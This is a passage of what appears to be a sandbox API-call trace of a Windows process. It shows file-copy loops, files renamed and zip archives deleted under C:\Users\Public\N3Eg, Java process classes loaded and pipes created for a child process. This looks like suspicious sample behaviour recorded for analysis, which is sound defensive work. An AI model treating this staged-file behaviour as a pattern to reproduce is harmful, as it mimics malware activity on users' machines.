lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.414] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.414] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.415] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.415] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.416] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.416] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.417] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.417] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.417] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.418] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.418] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.419] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.419] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.420] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.420] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.420] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.421] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.421] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.422] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.422] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.423] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1cc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.423] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.424] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x201, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.424] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.424] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ff, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.425] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.425] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.426] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.426] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.427] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.427] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.427] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.428] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x201, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.428] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.429] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ff, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.429] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.430] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.430] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.431] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.431] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.431] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.432] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.432] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x201, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.433] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.433] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fe, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.434] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.434] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.434] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.437] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x201, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.437] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.438] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fe, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.438] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.438] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x201, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.439] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.439] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.440] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.440] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ff, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.441] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.441] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x201, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.441] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.442] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x201, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.442] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.443] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x201, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.443] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x1a0, lpOverlapped=0x0) returned 1 [0026.444] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.444] CloseHandle (hObject=0x2b4) returned 1 [0026.463] CloseHandle (hObject=0x2b0) returned 1 [0026.464] wcslen (_String="C:\\Users\\Public\\N3Eg\\ljkg1") returned 0x1a [0026.464] wcscpy (in: _Dest=0x15010cc0, _Source="C:\\Users\\Public\\N3Eg\\ljkg1" | out: _Dest="C:\\Users\\Public\\N3Eg\\ljkg1") returned="C:\\Users\\Public\\N3Eg\\ljkg1" [0026.464] wcslen (_String="C:\\Users\\Public\\N3Eg\\N3Eg1.51N3E") returned 0x20 [0026.464] wcscpy (in: _Dest=0xb4d9c8, _Source="C:\\Users\\Public\\N3Eg\\N3Eg1.51N3E" | out: _Dest="C:\\Users\\Public\\N3Eg\\N3Eg1.51N3E") returned="C:\\Users\\Public\\N3Eg\\N3Eg1.51N3E" [0026.464] _wrename (_OldFileName="C:\\Users\\Public\\N3Eg\\ljkg1", _NewFileName="C:\\Users\\Public\\N3Eg\\N3Eg1.51N3E") returned 0 [0026.466] wcslen (_String="C:\\Users\\Public\\N3Eg\\ljkg2") returned 0x1a [0026.466] wcscpy (in: _Dest=0x15010cc0, _Source="C:\\Users\\Public\\N3Eg\\ljkg2" | out: _Dest="C:\\Users\\Public\\N3Eg\\ljkg2") returned="C:\\Users\\Public\\N3Eg\\ljkg2" [0026.466] wcslen (_String="C:\\Users\\Public\\N3Eg\\N3Eg2.51N3E") returned 0x20 [0026.466] wcscpy (in: _Dest=0xb4d9c8, _Source="C:\\Users\\Public\\N3Eg\\N3Eg2.51N3E" | out: _Dest="C:\\Users\\Public\\N3Eg\\N3Eg2.51N3E") returned="C:\\Users\\Public\\N3Eg\\N3Eg2.51N3E" [0026.466] _wrename (_OldFileName="C:\\Users\\Public\\N3Eg\\ljkg2", _NewFileName="C:\\Users\\Public\\N3Eg\\N3Eg2.51N3E") returned 0 [0026.467] wcslen (_String="C:\\Users\\Public\\N3Eg\\N3Eg1.zip") returned 0x1e [0026.468] wcscpy (in: _Dest=0x1501c1a0, _Source="C:\\Users\\Public\\N3Eg\\N3Eg1.zip" | out: _Dest="C:\\Users\\Public\\N3Eg\\N3Eg1.zip") returned="C:\\Users\\Public\\N3Eg\\N3Eg1.zip" [0026.468] SetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg1.zip", dwFileAttributes=0x80) returned 1 [0026.468] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg1.zip") returned 0x80 [0026.468] DeleteFileW (lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg1.zip" (normalized: "c:\\users\\public\\n3eg\\n3eg1.zip")) returned 1 [0026.488] wcslen (_String="C:\\Users\\Public\\N3Eg\\N3Eg2.zip") returned 0x1e [0026.488] wcscpy (in: _Dest=0x1501c1a0, _Source="C:\\Users\\Public\\N3Eg\\N3Eg2.zip" | out: _Dest="C:\\Users\\Public\\N3Eg\\N3Eg2.zip") returned="C:\\Users\\Public\\N3Eg\\N3Eg2.zip" [0026.488] SetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg2.zip", dwFileAttributes=0x80) returned 1 [0026.488] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg2.zip") returned 0x80 [0026.489] DeleteFileW (lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg2.zip" (normalized: "c:\\users\\public\\n3eg\\n3eg2.zip")) returned 1 [0026.497] strlen (_Str="java/lang/Runtime") returned 0x11 [0026.500] strlen (_Str="java/lang/ProcessBuilder.class") returned 0x1e [0026.500] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x32e8583, lpNewFilePointer=0x0, dwMoveMethod=0x4beb58 | out: lpNewFilePointer=0x0) returned 1 [0026.500] ReadFile (in: hFile=0xd4, lpBuffer=0xacb6a0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4beb28, lpOverlapped=0x0 | out: lpBuffer=0xacb6a0*, lpNumberOfBytesRead=0x4beb28*=0xa0, lpOverlapped=0x0) returned 1 [0026.500] strlen (_Str="java/lang/ProcessBuilder.class") returned 0x1e [0026.500] strcpy (in: _Dest=0x4bec5c, _Source="java/lang/ProcessBuilder.class" | out: _Dest="java/lang/ProcessBuilder.class") returned="java/lang/ProcessBuilder.class" [0026.500] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16aaa0c, lpNewFilePointer=0x0, dwMoveMethod=0x4be75c | out: lpNewFilePointer=0x0) returned 1 [0026.500] ReadFile (in: hFile=0xd4, lpBuffer=0x4be794, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be72c, lpOverlapped=0x0 | out: lpBuffer=0x4be794*, lpNumberOfBytesRead=0x4be72c*=0x1e, lpOverlapped=0x0) returned 1 [0026.502] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16aaa48, lpNewFilePointer=0x0, dwMoveMethod=0x4be798 | out: lpNewFilePointer=0x0) returned 1 [0026.502] ReadFile (in: hFile=0xd4, lpBuffer=0x15024e70, nNumberOfBytesToRead=0x17c9, lpNumberOfBytesRead=0x4be768, lpOverlapped=0x0 | out: lpBuffer=0x15024e70*, lpNumberOfBytesRead=0x4be768*=0x17c9, lpOverlapped=0x0) returned 1 [0026.504] strlen (_Str="java/lang/ProcessImpl.class") returned 0x1b [0026.504] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x32e87c8, lpNewFilePointer=0x0, dwMoveMethod=0x4be964 | out: lpNewFilePointer=0x0) returned 1 [0026.504] ReadFile (in: hFile=0xd4, lpBuffer=0xacb6a0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be934, lpOverlapped=0x0 | out: lpBuffer=0xacb6a0*, lpNumberOfBytesRead=0x4be934*=0xa0, lpOverlapped=0x0) returned 1 [0026.504] strlen (_Str="java/lang/ProcessImpl.class") returned 0x1b [0026.505] strcpy (in: _Dest=0x4bea68, _Source="java/lang/ProcessImpl.class" | out: _Dest="java/lang/ProcessImpl.class") returned="java/lang/ProcessImpl.class" [0026.505] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16ad87a, lpNewFilePointer=0x0, dwMoveMethod=0x4be568 | out: lpNewFilePointer=0x0) returned 1 [0026.505] ReadFile (in: hFile=0xd4, lpBuffer=0x4be5a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be538, lpOverlapped=0x0 | out: lpBuffer=0x4be5a0*, lpNumberOfBytesRead=0x4be538*=0x1e, lpOverlapped=0x0) returned 1 [0026.505] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16ad8b3, lpNewFilePointer=0x0, dwMoveMethod=0x4be5a4 | out: lpNewFilePointer=0x0) returned 1 [0026.505] ReadFile (in: hFile=0xd4, lpBuffer=0x15024e70, nNumberOfBytesToRead=0x2103, lpNumberOfBytesRead=0x4be574, lpOverlapped=0x0 | out: lpBuffer=0x15024e70*, lpNumberOfBytesRead=0x4be574*=0x2103, lpOverlapped=0x0) returned 1 [0026.514] strlen (_Str="java/lang/Process.class") returned 0x17 [0026.514] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x32e81d5, lpNewFilePointer=0x0, dwMoveMethod=0x4be304 | out: lpNewFilePointer=0x0) returned 1 [0026.514] ReadFile (in: hFile=0xd4, lpBuffer=0xacb6a0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be2d4, lpOverlapped=0x0 | out: lpBuffer=0xacb6a0*, lpNumberOfBytesRead=0x4be2d4*=0xa0, lpOverlapped=0x0) returned 1 [0026.514] strlen (_Str="java/lang/Process.class") returned 0x17 [0026.514] strcpy (in: _Dest=0x4be408, _Source="java/lang/Process.class" | out: _Dest="java/lang/Process.class") returned="java/lang/Process.class" [0026.514] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16a8191, lpNewFilePointer=0x0, dwMoveMethod=0x4bdf08 | out: lpNewFilePointer=0x0) returned 1 [0026.514] ReadFile (in: hFile=0xd4, lpBuffer=0x4bdf40, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bded8, lpOverlapped=0x0 | out: lpBuffer=0x4bdf40*, lpNumberOfBytesRead=0x4bded8*=0x1e, lpOverlapped=0x0) returned 1 [0026.515] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16a81c6, lpNewFilePointer=0x0, dwMoveMethod=0x4bdf44 | out: lpNewFilePointer=0x0) returned 1 [0026.515] ReadFile (in: hFile=0xd4, lpBuffer=0x150270d8, nNumberOfBytesToRead=0x42b, lpNumberOfBytesRead=0x4bdf14, lpOverlapped=0x0 | out: lpBuffer=0x150270d8*, lpNumberOfBytesRead=0x4bdf14*=0x42b, lpOverlapped=0x0) returned 1 [0026.517] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0026.517] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0026.517] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0026.517] GetHandleInformation (in: hObject=0x3, lpdwFlags=0x4bf204 | out: lpdwFlags=0x4bf204) returned 1 [0026.518] SetHandleInformation (hObject=0x3, dwMask=0x1, dwFlags=0x0) returned 0 [0026.518] GetHandleInformation (in: hObject=0x7, lpdwFlags=0x4bf204 | out: lpdwFlags=0x4bf204) returned 1 [0026.518] SetHandleInformation (hObject=0x7, dwMask=0x1, dwFlags=0x0) returned 0 [0026.518] GetHandleInformation (in: hObject=0xb, lpdwFlags=0x4bf204 | out: lpdwFlags=0x4bf204) returned 1 [0026.519] SetHandleInformation (hObject=0xb, dwMask=0x1, dwFlags=0x0) returned 0 [0026.519] CreatePipe (in: hReadPipe=0x4bf1c8, hWritePipe=0x4bf1cc, lpPipeAttributes=0x0, nSize=0x1018 | out: hReadPipe=0x4bf1c8*=0x2b4, hWritePipe=0x4bf1cc*=0x2b8) returned 1 [0026.519] SetHandleInformation (hObject=0x2b4, dwMask=0x1, dwFlags=0x1) returned 1 [0026.519] CreatePipe (in: hReadPipe=0x4bf1d4, hWritePipe=0x4bf1d8, lpPipeAttributes=0x0, nSize=0x1018 | out: hReadPipe=0x4bf1d4*=0x2bc, hWritePipe=0x4bf1d8*=0x2c0) returned 1 [0026.519] SetHandleInformation (hObject=0x2c0, 